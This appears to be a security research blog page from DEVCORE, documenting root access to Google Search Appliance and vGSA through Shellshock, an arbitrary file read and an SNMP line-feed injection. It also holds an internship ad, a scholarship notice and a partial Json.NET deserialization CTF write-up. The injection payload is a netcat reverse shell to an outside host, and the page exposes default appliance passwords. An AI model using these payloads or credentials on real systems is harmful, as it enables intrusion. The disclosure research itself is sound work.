install_bundle-10000855-7.6.50-64.bin
install_bundle-10000878-7.6.250-12.bin
install_bundle-10000888-7.6.250-20.bin
install_bundle-10000901-7.6.250-26.bin
install_bundle-10000915-7.6.360-10.bin
install_bundle-10000926-7.6.360-16.bin
install_bundle-10000967-7.6.512-18.bin
sw_files-5.0.4-22.bin
sw_files-6.14.0-28.bin
sw_files-7.0.14-238.bin
vm_patch_1_for_504_G22_and_G24_only.bin

vGSA (Virtual Google Search Appliance)

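Next, we began researching vGSA. By default, after the virtual machine is imported, the system only offers a network configuration function and provides no shell to work with. However, because the virtual machine runs in our own environment, system privileges can usually be obtained in the following ways:

  • Directly modifying unencrypted disk files
  • Modifying the virtual machine's memory contents
  • Booting from a CD or disk of another operating system
  • Other known vulnerabilities
  • Hard-coded administrator or system accounts and passwords

The following image shows the vGSA network configuration screen: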

CVE-2014-6271

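When testing early Linux appliances and services, especially those using Red Hat family operating systems, Shellshock vulnerabilities are common, and the vGSA released in 2008 is no exception. A value inserted into option 114 on the DHCP server is set as an environment variable, which triggers the vulnerability and executes arbitrary commands:

The command was: useradd zzzzgsa. The console output shows this command being executed repeatedly and producing error messages.

vGSA observations

After successfully obtaining operating system privileges, we examined the network environment, running programs, and file system. Here is what we learned from observing the operating system environment: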

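  • The version number is 5.2.0.G.27.
  • Services are mainly written in C/C++, Java, and Python.
  • /export/hda3 appears to be the directory primarily used by the services.
  • /etc/shadow contains the root account with password hash x███████████M.
  • The admin interface on ports 8000 and 8443 has the default admin password j0njlRXpU5CQ.
  • /.gnupg contains the ent_box_key public and private keys.
  • /.gnupg contains the google_license_key public key.
  • /.ssh/authorized_keys contains two public keys.
  • /root/.ssh/authorized_keys contains one public key.
  • /root/.ssh/ contains two SSH public/private key pairs.
  • /root/.gnupg/ contains the ent_box_key public and private keys.
  • Oracle's Outside In Technology is used to convert documents into HTML pages.
  • The Java runtime environment is protected by a Security Manager.
  • The engineer support request function uses ppp to build a virtual private network; /etc/ppp/chap-secrets contains account passwords ( z██████c, ]███████T ).
  • The boot menu password in /etc/lilo.conf is cmBalx7.
  • /export/hda3/versionmanager/google_key.symmetric holds what appears to be a password used for symmetric encryption.
  • /export/hda3/versionmanager/vmanager_passwd contains two username-password combinations ( admin: M█████████████████████████w=:9██= google:w█████████████████████████o=:N██= ).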

The programs that provide network services are as follows:

Listen Port | Process Name | Program Language | Function
22 | ssh | C/C++ | OpenSSH Server
53 | named | C/C++ | Bind Named
953 | named | C/C++ | Bind Named
1111 | webserver_config | python | Installer
2100 | adminrunner.py | python | enterpriseconsole backend
3990 | monitor | C/C++ | monitor
4000 | rtserver | C/C++ | unknown
4430 | EnterpriseFrontend | Java (with security manager) | https frontend
4911 | borgmon | C/C++ | borgmon
4916 | reactor | C/C++ | unknown
5000 | rtserver | C/C++ | unknown
5600 | rtserver | C/C++ | unknown
6600 | cacheserver | C/C++ | unknown
7800 | EnterpriseFrontend | Java (with security manager) | unknown
7880 | TableServer | Java (with security manager) | unknown
7882 | AuthzChecker | Java (without security manager) | unknown
7886 | tomcat | Java | tomcat server
8000 | EnterpriseAdminConsole | Java (without security manager) | unknown
8443 | stunnel | C/C++ | redirect http to https
8888 | GWS | C/C++ | unknown
9300 | oneboxserver | C/C++ | unknown
9328 | entspellmixer | C/C++ | unknown
9400 | mixserver | C/C++ | unknown
9402 | mixserver | C/C++ | unknown
9448 | qrewrite | C/C++ | unknown
9450 | EnterpriseAdminConsole | Java (without security manager) | unknown
10094 | enterprise_onebox | C/C++ | unknown
10200 | clustering_server | C/C++ | unknown
11913 | sessionmanager | C/C++ | unknown
12345 | RegistryServer | Java (without security manager) | unknown
19780 | configmgr/ent_configmgr.py | python | unknown
19900 | feedergate | C/C++ | unknown
21200 | FileSystemGateway | Java (with security manager) | unknown
31300 | rtserver | C/C++ | unknown

Although there are so many services, iptables blocks most connections. The iptables settings are as follows:

# Redirect privileged ports.
# (we listen as nobody, which can't attach to low ports, so redirect to high ports)
#
-A PREROUTING -i eth0 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 7800
-A PREROUTING -i eth0 -p tcp -m tcp --dport 443 -j REDIRECT --to-ports 4430
-A PREROUTING -i eth0 -p tcp -m tcp --dport 444 -j REDIRECT --to-ports 4431
-A INPUT -i eth0 -p udp -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7800 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 7801 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4430 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 4431 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 19900 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8000 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 8443 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9941 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 9942 -j ACCEPT
-A INPUT -i eth0 -p tcp -m tcp --dport 10999 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --sport 68 --dport 67 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 53 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 137:138 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 123 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 514 -j ACCEPT
-A INPUT -i eth0 -p udp -m udp --dport 161 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --sport 161 -j ACCEPT
-A OUTPUT -o eth0 -p udp -m udp --dport 162 -j ACCEPT

The TCP attack surface that is actually reachable is summarized below:

Port | Service | Program Location
22 | ssh | /usr/sbin/sshd
7800 | EnterpriseFrontend | /export/hda3/5.2.0/local/google/bin/EnterpriseFrontend.jar
4430 | EnterpriseFrontend | /export/hda3/5.2.0/local/google/bin/EnterpriseFrontend.jar
19900 | feedergate | /export/hda3/5.2.0/local/google/bin/feedergate
8000 | EnterpriseAdminConsole | /export/hda3/5.2.0/local/google/bin/EnterpriseAdminConsole.jar
8443 | stunnel | /usr/sbin/stunnel

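We found that the string in /export/hda3/versionmanager/google_key.symmetric can be used to decrypt the contents of every install_bundle! Having gained privileges with CVE-2014-6271 and being able to extract the install bundle contents, we paused our research on vGSA for now. Its runtime environment has relatively few memory protections, so weaknesses may exist and be exploitable: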

GSA

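After installing the appliance, we tried to change the boot order, but found that entering the BIOS requires a password, and that only some functions of the Dell H700 are available in the disk controller's management interface:

Next, we tried to read the hard drive contents directly. If the drive is not encrypted, the appliance's operating system and software may be obtained directly. The hard drive uses a SAS interface, so a SAS card had to be purchased first; an LSI 9211-8i was used for the connection in this test:

After connecting and attempting to read, we found that this is a self-encrypting drive (SED) that requires a password to unlock before access. OSSLab has a more detailed explanation here:

https://www.osslab.com.tw/ata-sed-security/ (Chinese)

When the hard drive cannot be accessed directly, there are several ways to keep trying:

  • Try to read the password from the BIOS EEPROM and change the boot order

This method requires damaging the motherboard and carries some risk, so it is used only when no vulnerability can be found at the software level. See this research: https://blog.cybercx.co.nz/bypassing-bios-password (English)

  • Use PCILeech to read and write memory and gain system privileges

This method requires a specific PCI-e device, which we had not prepared at the time. See this GitHub project:

https://github.com/ufrisk/pcileech

  • Look for software vulnerabilities in the accessible services

This method is simpler and more feasible.

LF injection in the admin console

After logging into the admin console, we noticed a feature for retrieving system information through SNMP, and this feature accepts custom strings:

We tried a classic line-feed injection here:

Insert the following into sysContact:

extend shell /bin/nc -e /bin/sh 10.5.2.1 4444

After inserting the extend directive, snmpwalk can be used to trigger SNMP's extend functionality and execute a shell.

The command executed successfully and connected back.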

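Arbitrary File Reading

In the RPM installation packages of the GSA 6.x series and later, we found that the web services on ports 80/443 use Apache httpd, with many configuration files located in /etc/httpd/conf.d/. In gsa-http.conf and gsa-https.conf, certain directories are proxied to specific local services: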

  RewriteEngine on
  RewriteRule ^/security-manager/(.*) http://localhost:7886/security-manager/$1 [P,L]
  RewriteRule ^/d██████████/(.*) http://localhost:7890/dps/d██████████/$1 [P,L]
  RewriteRule ^/s██████/(.*) http://localhost:7890/dps/s██████/$1 [P,L]
  RewriteRule ^/v█████/(.*) http://localhost:7890/v█████/$1 [P,L]
  RewriteRule ^/$ http://localhost:7800/ [P,L]
  RewriteRule ^/(.*) http://localhost:7800/$1 [P,L]

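The services on ports 7886 and 7890 are separately running Apache Tomcat servers. When two or more layers of web servers are chained, Tomcat's handling of the path segment ..;/ is an interesting test point. See this talk by a senior colleague: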

https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf

而我們有興趣的點為 dps ,這似乎沒有在舊版的 GSA 中看到。 從 dps.war 中解出 /WEB-INF/web.xml 觀察網頁應用配置,並發現 /font 會呼叫 com.documill.dps.connector.servlet.user.DPSDownloadServlet

<servlet><servlet-name>font</servlet-name><servlet-class>com.documill.dps.connector.servlet.user.DPSDownloadServlet</servlet-class><init-param><param-name>rootDirectory</param-name><param-value>work/fonts/</param-value></init-param></servlet><servlet-mapping><servlet-name>font</servlet-name><url-pattern>/font/*</url-pattern></servlet-mapping>

接著查看 DPSDownloadServlet:

importcom.davisor.net.servlet.DownloadServlet;importcom.documill.dps.*;importjava.io.*;importjavax.servlet.ServletContext;publicclassDPSDownloadServletextendsDownloadServletimplementsDPSUserService{publicDPSDownloadServlet(){}protectedStringgetRealPath(ServletContextservletcontext,Strings)throwsIOException{DPSdps=DPSSingleton.getDPS();Filefile=dps.getHomeDir();if(file==null)thrownewFileNotFoundException("DPSDownloadServlet:getRealPath:DPS home directory not specified");elsereturn(newFile(file,s)).getAbsolutePath();}privatestaticfinallongserialVersionUID=0L;}

發現此類別是繼承自 com.davisor.net.servlet.DownloadServlet,跟進此類別:

protectedvoidservice(HttpServletRequesthttpservletrequest,HttpServletResponsehttpservletresponse)throwsServletException,IOException{Strings=httpservletrequest.getParameter(uriParameterName);if(!isValid(s)){httpservletresponse.sendError(400,(newStringBuilder()).append("Invalid file path: ").append(s).toString());return;}Filefile=rootDirectory.deriveFile(s);if(!file.isFile())httpservletresponse.sendError(404,(newStringBuilder()).append("No file:").append(s).toString());elseif(!file.canRead()){httpservletresponse.sendError(403,(newStringBuilder()).append("Unreadable file:").append(s).toString());}else{longl=file.length();if(l>0x7fffffffL){httpservletresponse.sendError(413,(newStringBuilder()).append("File too big:").append(l).toString());}else{Strings1=MIME.getTypeFromPath(file.getName(),"application/octet-stream");httpservletresponse.setContentLength((int)l);httpservletresponse.setContentType(s1);httpservletresponse.setDateHeader("Last-Modified",file.lastModified());if(cacheExpires>0L){httpservletresponse.setDateHeader("Expires",System.currentTimeMillis()+cacheExpires);httpservletresponse.setHeader("Cache-Control","public");}IO.copy(file,httpservletresponse.getOutputStream());}}}privatestaticbooleanisValid(Strings){return!Strings.isEmpty(s)&&!s.contains("..");}

The only check here is whether the string contains .., but we can simply specify an absolute path and read arbitrary local files directly!
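The gap in isValid can be illustrated with a small model. This Python sketch is not the Davisor code: naive_is_valid mirrors only the ".." check quoted above, resolve_inside is a hypothetical stricter check, and the root directory /opt/dps/work/fonts is a made-up example. It assumes, as reported above, that an absolute path is honored by the file lookup.

```python
import posixpath


def naive_is_valid(path):
    """Mirror of the quoted check: non-empty and no '..' substring."""
    return bool(path) and ".." not in path


def resolve_inside(root, requested):
    """Hypothetical stricter check: return the resolved path only if it
    stays under root, otherwise None."""
    root_norm = posixpath.normpath(root)
    # posixpath.join discards root when requested is absolute, which models
    # the behaviour the article reports for the servlet.
    candidate = posixpath.normpath(posixpath.join(root_norm, requested))
    if candidate != root_norm and not candidate.startswith(root_norm + "/"):
        return None
    return candidate


ROOT = "/opt/dps/work/fonts"  # assumed location, for illustration only
absolute_passes_naive = naive_is_valid("/etc/passwd")
absolute_blocked = resolve_inside(ROOT, "/etc/passwd") is None
```

The point of the design is to validate the resolved path rather than the raw string: any check on the input text alone has to anticipate every way a path can escape the root.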

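Older GSA versions do not have the /font endpoint, but /dps/admin has a similar file read issue: logName can be set directly to read a file. As shown in the figure below, this reads the account and password file of the system admin console:

After cracking the hash and logging in, we can enable the SNMP service and combine it with the first vulnerability to execute arbitrary commands as root.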

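Other Findings and Notes

Internal Service URLs

Many of the sub-services inside GSA communicate with each other over HTTP, and many of them expose URLs such as /varz, /helpz, and /procz, which can be accessed from the trusted network locations defined by the service or from 127.0.0.1:

On vGSA, we observed that the service is started with the parameter useripheader=X-User-Ip. As a result, the externally exposed admin interface can reach this functionality directly when the request carries an X-User-IP header: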
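Why a client-supplied address header defeats an IP allowlist can be shown with a toy model. The Python sketch below is hypothetical and is not GSA code: the function names, the TRUSTED set, and the way the header is consulted are all assumptions made for illustration.

```python
TRUSTED = {"127.0.0.1"}  # assumed allowlist for the internal pages


def effective_client_ip(peer_ip, headers, user_ip_header=None):
    """Return the address the service believes the request came from.

    If a user-IP header is configured and present, it overrides the real
    peer address. That is safe only when a trusted front end sets it.
    """
    if user_ip_header:
        for name, value in headers.items():
            if name.lower() == user_ip_header.lower():
                return value.strip()
    return peer_ip


def may_access_internal_page(peer_ip, headers, user_ip_header=None):
    return effective_client_ip(peer_ip, headers, user_ip_header) in TRUSTED


# An external client simply claims to be localhost.
spoofed = may_access_internal_page(
    "203.0.113.5", {"X-User-IP": "127.0.0.1"}, user_ip_header="X-User-Ip"
)
```

In this model the allowlist is only as strong as the guarantee that nothing outside the trusted proxy can set the header.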

The /procz endpoint can even be used to fetch the executable and the shared libraries it uses:

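Model Summary

Model | Manufacturer and model | Hardware specification | Version | Document count
Google Mini | Gigabyte | Pentium III 1G / 2GB memory / 120G | 3.4.14 | 300,000
Google Mini-002X | SuperMicro | Pentium 4 3G / 2GB memory / 250G HDD | 5.0.0 | Unknown
Google GB-1001 | Dell Poweredge 2950 | Xeon / 16GB memory / 1.25TB HDD | Unknown | 3,000,000
Google GB-1002 | Gigabyte | Unknown | Unknown | Unknown
Google GB-7007 | Dell R710 | Xeon E5520 / 48GB memory / 3TB HDD | Unknown | 10,000,000
Google GB-9009 | Unknown | Xeon X5560 / 96GB memory / 3.6TB HDD | Unknown | 30,000,000
Google G100 | Dell R720XD | Unknown | Unknown | Unknown
Google G500 | Unknown | Unknown | Unknown | Unknown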

Kernel Versions

GSA version | Kernel version
7.6.0 | Linux version 3.14.44_gsa-x64_1.5 (mrevutskyi@mrevutskyi.mtv.corp.google.com) (gcc version 4.9.x-google 20150123 (prerelease) (Google_crosstoolv18-gcc-4.9.x-x86_64-grtev4-linux-gnu) ) #1 SMP Mon Nov 23 09:19:11 PST 2015
7.4.0 | Unknown
7.2.0 | Linux version 3.4.3_gsa-x64_1.5 (martincochran@ypc-ubiq202.dls.corp.google.com) (gcc version 4.6.x-google 20120601 (prerelease) (Google_crosstoolv15-gcc-4.6.x-glibc-2.11.1-grte) ) #1 SMP Tue Jul 9 15:36:01 PDT 2013
7.0.14 | Linux version 3.4.3_gsa-x64_1.3 (stephenamar@neutrino.mtv.corp.google.com) (gcc version 4.6.x-google 20120601 (prerelease) (Google_crosstoolv15-gcc-4.6.x-glibc-2.11.1-grte) ) #1 SMP Thu Jul 19 11:59:57 PDT 2012
5.2.0 | Linux version 2.6.20_vmw-smp_3.1 (yifeng@yifeng.corp.google.com) (gcc version 4.1.1) #1 SMP Thu Jan 24 22:34:28 PST 2008

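Timeline

Date | Event
2005/06/10 | Java Code Injection CVE-2005-3757 reported by H D Moore
First half of 2008 | GSA 5.0 released
2008/10/28 | vgsa_20081028.7z (5.2.0) released
2013/04/20 | GSA 6.14.0.G28 released
2014/03/20 | XSS vulnerability CVE-2014-0362 reported by Will Dormann
2014/10/01 | GSA 7.0.14.G238 released
2014/10/03 | GSA 7.2.0.G252 released
2014/12/12 | GSA 7.2.0.G264 released
2015/02/07 | GSA 7.2.0.G270 released
2015/04/15 | GSA 7.4.0.G64 released
2015/04/22 | GSA 7.4.0.G72 released
2015/04/30 | GSA 7.4.0.G74 released
2015/06/04 | GSA 7.4.0.G82 released
First half of 2016 | Google announces that GSA will be phased out of the market
2016/01/05 | XML External Entity attack reported by Timo
2016/05/24 | GSA 7.6.0.G36 released
2016/07/01 | GSA 7.6.0.G42 released
2016/07/31 | The author obtains this appliance, running version 7.0.14
2016/08/25 | GSA 7.6.0.G46 released
2016/10/21 | GSA 7.6.0.G58 released
2017/01/19 | GSA 7.6.50.G30 released
2017/04/19 | GSA 7.6.50.G36 released
2017/07/28 | GSA 7.6.50.G64 released
2017/11/09 | GSA 7.6.250.G12 released
2017/12/28 | Last date on which GSA could be ordered
2018/01/17 | GSA 7.6.250.G20 released
2018/03/21 | GSA 7.6.250.G26 released
2018/06/15 | GSA 7.6.360.G10 released
2018/10/08 | GSA 7.6.360.G16 released
2019/04/26 | GSA 7.6.512.G18 released, probably the final version
2021/08/16 | Vulnerabilities reported
2021/08/16 | Automated reply confirms receipt of the report email
2021/08/16 | Issue assigned on issuetracker.google.com
2021/08/18 | Google indicates the vulnerabilities do not qualify for a reward, but will discuss them again at the next meeting
2021/08/20 | Confirmed that no reward will be paid
2021/11/01 | Asked whether CVE IDs would be assigned
2021/11/02 | Confirmed that no CVE IDs will be assigned
First half of 2023 | Started writing this article
2023/06/04 | First draft completed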

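Conclusion

Although GSA/vGSA is an end-of-life product, studying how Google hardened the appliance and reduced its attack vectors broadens knowledge in areas we rarely touch. Although not covered in detail in this article, techniques such as Java's Security Manager and the Linux kernel's seccomp are used in GSA. This research also leaves several targets for follow-up work:

  • The feedergate service
  • Memory corruption vulnerabilities in the document conversion done by Oracle's Outside-in Technology
  • The convert_to_html seccomp sandbox

We will share more when we have results. See you next time.

Other References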

DEVCORE 2023 Fourth Internship Program


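DEVCORE was founded more than ten years ago and has stayed focused on providing proactive security services, working to find security risks and vulnerabilities and make the world safer. To keep finding new security talent who share this vision, and to help students build sound security awareness and skills, we established the "DEVCORE National Information Security Scholarship", and in early 2022 we launched our first internship program. The results so far have been fruitful and beyond expectations, and the third internship program will wrap up at the end of July this year. We are pleased to announce that the fourth internship program is about to begin. If you would like to join us and sharpen your security skills, please read the information below and apply by email!

Internship Content

This internship is divided into two tracks, Binary and Web. The main content is as follows:

  • Binary: research-focused. After agreeing on a research target with your mentor, you will analyze the target's architecture and perform reverse engineering or code review. This process trains your thinking and helps you find possible attack surfaces and potential weaknesses. You will also analyze past vulnerabilities and write exploits for them, to understand where vulnerabilities have appeared and to experience how real-world vulnerabilities are exploited.
    • Vulnerability discovery and research 70%
    • 1-day development (Exploitation) 30%
  • Web: the mentor and the student will discuss and settle on an internship goal driven mainly by the student's own aspirations, with guidance along the way to reach that goal. Topics may include in-depth research on new vulnerability classes that have become common in recent years, attack techniques, open source software, or common weaknesses in programming language ecosystems, or showcasing your technical skills by developing red-team-related tools.
    • Research on vulnerabilities, attack techniques, or tool development 90%
    • Final report and preparation 10%

Office Location

13F, No. 32, Sec. 3, Bade Rd., Songshan Dist., Taipei City

Internship Period

  • From September 2023 to the end of January 2024, five months in total.
  • Two working days per week, working hours 10:00 – 18:00
    • One fixed afternoon per week, 14:00 - 18:00, must be spent at the office to discuss progress
      • Flexible arrangements are possible if you live outside Taipei and New Taipei (but must be uniform within each track)
    • All remaining time is remote work

Who We Are Recruiting

Students with a reasonable security background who can work two days per week.

Expected Number of Openings

  • Binary track: 2~3 people
  • Web track: 2~3 people

Compensation

NT$16,000 per month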

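Requirements, Qualifications, and Process

Internship Requirements

Binary

  • Basic reverse engineering and debugging skills
    • Able to read assembly and familiar with basic Debugger usage
  • Basic exploitation skills
    • Must know Stack overflow, ROP, and related exploitation techniques
  • Basic Scripting Language development skills
    • Python, Ruby
  • Able to analyze large Open Source projects
    • Mainly C/C++
  • Basic operating system knowledge
    • For example, the concepts of Virtual Address and Physical Address
  • Code Auditing
    • Know what kinds of code are problematic
      • Buffer Overflow
      • Use After free
      • Race Condition
  • Passion for research and a habit of understanding how technology really works
  • Nice to have, but not required
    • CTF competition experience
    • pwnable.tw score
    • Enjoys sharing technical knowledge
      • Public technical blog/slides, Write-ups, or talks
    • Proficient in IDA Pro or Ghidra
    • Has written a 1-day exploit
    • Experience in at least one of the following
      • Kernel Exploit
      • Windows Exploit
      • Browser Exploit
      • Bug Bounty

Web

  • Familiar with the OWASP Web Top 10.
  • Understands all security topics in the PortSwigger Web Security Academy, or has completed all of its Labs.
    • Reference: https://portswigger.net/web-security/all-materials
  • Understands the basic concepts of computer networking.
  • Comfortable with the Command Line, including common or built-in system commands and tools on Unix-like and Windows operating systems.
  • Familiar with any one web programming language (for example PHP, ASP.NET, JSP) and able to build a complete web service.
  • Familiar with any one Scripting Language (for example Shell Script, Python, Ruby) and able to use scripts to support research.
  • Debugging skills: able to use a Debugger to trace program flow, and to reproduce and narrow down problems.
  • Able to set up and configure common web servers (for example Nginx, Apache) and operating systems (for example Linux).
  • A drive to get to the bottom of things.
  • Nice to have, but not required
    • Has independently discovered a 0-day vulnerability.
    • Has independently analyzed a known vulnerability and written a 1-day exploit.
    • Has authored and deployed challenges for a CTF competition.
    • Holds OSCP or a certification of equivalent level.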

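Application Process

The selection has two stages:

Stage 1: Written Review

The first stage is a written review of the following two items:

  • Résumé
  • Answers to the short-answer questions
    • Question 1: Name three real vulnerabilities or attack chains, made public between 2021 and 2023, that impressed you most or that you found interesting, and briefly explain in your own words each one's root cause, exploitation conditions, and possible impact.
    • Question 2: Topics you would like to research during the internship. Propose three concrete candidate topics and briefly explain your reasons or what you hope to accomplish, for example:
      • Research ◯◯ open source software and find a critical weakness that allows RCE.
      • Research AD CS attack techniques and try to uncover new attack possibilities or vectors.
      • Research common routers, with targets including the AA-123 router and the BB-456 wireless router.

Submissions for this stage close at 2023/08/11 23:59. We will decide whether you pass the first stage based on your résumé and your answers, and we will reply within 10 working days.

Stage 2: Interview

This stage is a 30~120 minute interview (depending on the track, with details sent separately). Two or three senior team members will take part and assess whether you have the technical ability and personal qualities this internship requires.

Timeline

  • 2023/07/19 - 2023/08/11 Open recruitment
  • 2023/08/14 - 2023/08/24 Interviews
  • By 2023/08/28 Results sent
  • 2023/09/04 The fourth internship program starts that week

How to Apply

  • Send your résumé and your answers to the questions in PDF format to recruiting_intern@devco.re
    • For the résumé format, refer to the sample (DOCX, PAGES, PDF) and convert it to PDF. If you are confident, feel free to design the résumé that best presents your abilities.
    • Send it before 2023/08/11 23:59 (recruitment may close early if all openings are filled)
  • Email subject format: [應徵] position, your name (example: [應徵] Web 組實習生 王小美)
  • Keep the résumé within three pages. It must include at least the following:
    • Basic information
    • Education
    • Internship experience
    • Community activity experience
    • Notable achievements
    • Past security-related research
    • MBTI personality test result (test page)

For any questions about applying, please contact us by email only. We apologize for any inconvenience, thank you for writing to us, and look forward to having you join us!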

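Taking Talent Development as Our Responsibility: DEVCORE National Information Security Scholarship and Security Education Event Sponsorship Program Now Open for Applications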


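Today (the 30th), DEVCORE held the 2023 award ceremony for the "DEVCORE Information Security Scholarship" at Fu Jen Catholic University, where three students from the Department of Computer Science and Information Engineering received awards. At the same time, we are pleased to announce that this year we will again run the "National Information Security Scholarship" and the "Security Education Event Sponsorship Program", both open for applications starting today!

In recent years, driven by the digital wave and the cloud era, governments and enterprises alike have begun to face the shortage of security talent. Since its founding in 2012, DEVCORE has held to its original goal of raising Taiwan's security competitiveness and making the world safer, and treats talent development as its own responsibility. By taking part in the Ministry of Education's security talent development program, founding the DEVCORE internship program, launching the DEVCORE security scholarship, and running the security education event sponsorship program, we help security talent grow.

DEVCORE National Information Security Scholarship

The DEVCORE security scholarship was first awarded in 2020. It began as a way of giving back for the resources and encouragement we received as students, and was offered at the management team's alma maters, Fu Jen Catholic University and National Taiwan University of Science and Technology. To nurture more aspiring young students, last year we expanded the scholarship and opened applications to new security talent across the country. We hope to promote the "hacker mindset", strengthen security skills, help current students understand the security industry and its present state, and narrow the gap between study and practice, so that they become a new generation of offensive security professionals and bring new energy to the industry.

The "DEVCORE National Information Security Scholarship" welcomes applications from all students with outstanding research results in information security. Applicants must describe their motivation and journey in learning security and submit security research or competition results. We will select the 10 best applicants, and each recipient can receive a research grant of up to NT$20,000. The detailed application rules are as follows:

  • Eligibility: students at any college or university in Taiwan may apply.
  • Amount and number of awards: 10 recipients each year, each receiving a scholarship of NT$20,000, for a total of NT$200,000. If many applications are received, we may increase the number of awards depending on the applications.
  • Schedule:
    • 2023/8/30 Scholarship program announced on the official website
    • 2023/8/31 - 2023/9/30 Applications accepted
    • 2023/10/31 Results announced; scholarships will be awarded between November and December
  • How to apply:
    • Arrange the attached documents in the order of the document checklist, merge them into a single PDF file, and send it to scholarship@devco.re.
    • The email subject and PDF file name must follow this format: [全國獎學金申請] school name_student ID_name (example: [全國獎學金申請] 輔仁大學_B11100000_王小美).
    • Applicants must check their own submission and tick the attached documents in the applicant checklist area. Applications with missing documents or without the boxes properly ticked will not be accepted.
  • Required documents:
    • The scholarship application form
    • Proof of enrollment
    • Transcript for the most recent semester
    • An essay on your motivation and journey in learning information security: 500 - 2000 characters
    • Research results related to information security technology: submit at least one of the following six items: conference submission results, bug bounty program results, vulnerability research results, security competition results, security tool research results, or published technical articles
    • Community results: submit at least one of the following two items: campus security club or public security community
    • Recommendation letters: from an advisor, department chair, other professors, or industry professionals; at least two letters are required

DEVCORE Security Education Event Sponsorship Program

What we take from society, we give back to society. DEVCORE is about to enter its 11th year, and we hope to deepen the connection between campuses and industry in different ways, promote sound security awareness and the hacker mindset, and help Taiwan's security talent grow.

This year we will continue to sponsor security education events, providing funding for security-related communities and clubs to hold activities, bringing Taiwan's security community together and accelerating the development of Taiwan's new security talent.

  • Eligibility: community or club activities related to security topics. One club representative should fill in the form.
  • Sponsorship amount: decided according to each club's needs and in discussion with DEVCORE, up to NT$20,000 per event.
  • Schedule: clubs or events wishing to apply should fill in the preliminary information through the link below before 2023/10/31. Within 30 days we will ask eligible applicants to provide further information; ineligible applicants will not be notified separately.
  • Application link: DEVCORE 2023 Security Education Event Sponsorship Survey
  • Required information:
    • Eligibility: the applicant must apply in the name of a security community or club.
    • Contact email
    • Type of event you want to hold
    • Format of the event you want to hold
    • Total event budget
    • Estimated sponsorship amount needed
    • Representative's name and contact phone number
    • Group name
    • Group website
  • Notes:
    • Applications go through DEVCORE's internal review process, and DEVCORE retains the final decision.
    • This survey is only used to collect preliminary interest. Within 30 days DEVCORE will ask eligible applicants to provide further information for review; others will not be notified separately.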

HITCON 2023 x DEVCORE Wargame: My todolist Write-up


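For HITCON 2023, I again prepared three fun Wargame challenges for the DEVCORE booth this year, so that attendees could enjoy solving challenges hands-on in the gaps between talks. Besides the ones I prepared, all the other challenges can also be found in the following GitHub repository: https://github.com/DEVCORE-Wargame/HITCON-2023

The three challenges I prepared are What’s my IP, Submit flag, and My todolist. The first, What’s my IP, is a simple challenge: reading the code shows that it combines IP spoofing through an HTTP header with SQL Injection, although during the event participants had to find the weakness black-box, relying on experience and hacker intuition. The second, Submit flag, is a classic Race Condition, an old trick that is nonetheless often overlooked in penetration tests. To raise the success rate and keep participants from wasting too much time, I deliberately inserted an unnecessary sleep in the middle. That may have made the challenge too easy, but I hope it at least reminds everyone that this class of weakness still exists.

The last challenge is the topic I want to share in this article: My todolist. In short, it is a simple white-box challenge built on a Json.NET deserialization vulnerability, and the vulnerable code is at line 20 of Extensions/WebExtension.cs. But I would like to share a bit about where the challenge came from.

The challenge originated from a Deep Copy implementation similar to the following, which I had seen in some programs: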

public static T Clone<T>(this T source)
{
    JsonSerializerSettings settings = new JsonSerializerSettings()
    {
        TypeNameHandling = TypeNameHandling.All
    };
    return (T)JsonConvert.DeserializeObject(JsonConvert.SerializeObject(source, settings), settings);
}

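We all know that when the source string passed to DeserializeObject is attacker-controlled and TypeNameHandling is enabled, it is easy to abuse deserialization's ability to instantiate arbitrary objects in order to execute arbitrary code or system commands. In the Deep Clone scenario, however, the source string is the output of SerializeObject, which means the $type property that names the object type is controlled by Json.NET rather than by us, so this code should not be exploitable. Unless, that is, we could overwrite the $type property?

This question piqued my curiosity, so I decided to experiment. When I serialized a Dictionary object with the following code, I got an interesting result.

Dictionary<string, string> source = new Dictionary<string, string>();
source.Add("key", "value");
JsonSerializerSettings settings = new JsonSerializerSettings()
{
    TypeNameHandling = TypeNameHandling.All
};
string result = JsonConvert.SerializeObject(source, settings);

Result: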

{"$type":"System.Collections.Generic.Dictionary`2[[System.String, mscorlib],[System.String, mscorlib]], mscorlib","key":"value"}

When a Dictionary is serialized, every key/value pair we insert sits at the same level as the $type property. So what happens if the Dictionary contains a key named $type?

Dictionary<string, string> source = new Dictionary<string, string>();
source.Add("$type", "System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
JsonSerializerSettings settings = new JsonSerializerSettings()
{
    TypeNameHandling = TypeNameHandling.All
};
JsonConvert.DeserializeObject(JsonConvert.SerializeObject(source, settings), settings);

We get an exception:

Newtonsoft.Json.JsonSerializationException: ‘Type specified in JSON ‘System.Web.Security.RolePrincipal, System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a’ is not compatible with ‘System.Collections.Generic.Dictionary`2[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089’. Path ‘$type’, line 1, position 236.’

If we set a debug breakpoint and print the string produced by JsonConvert.SerializeObject, we get:

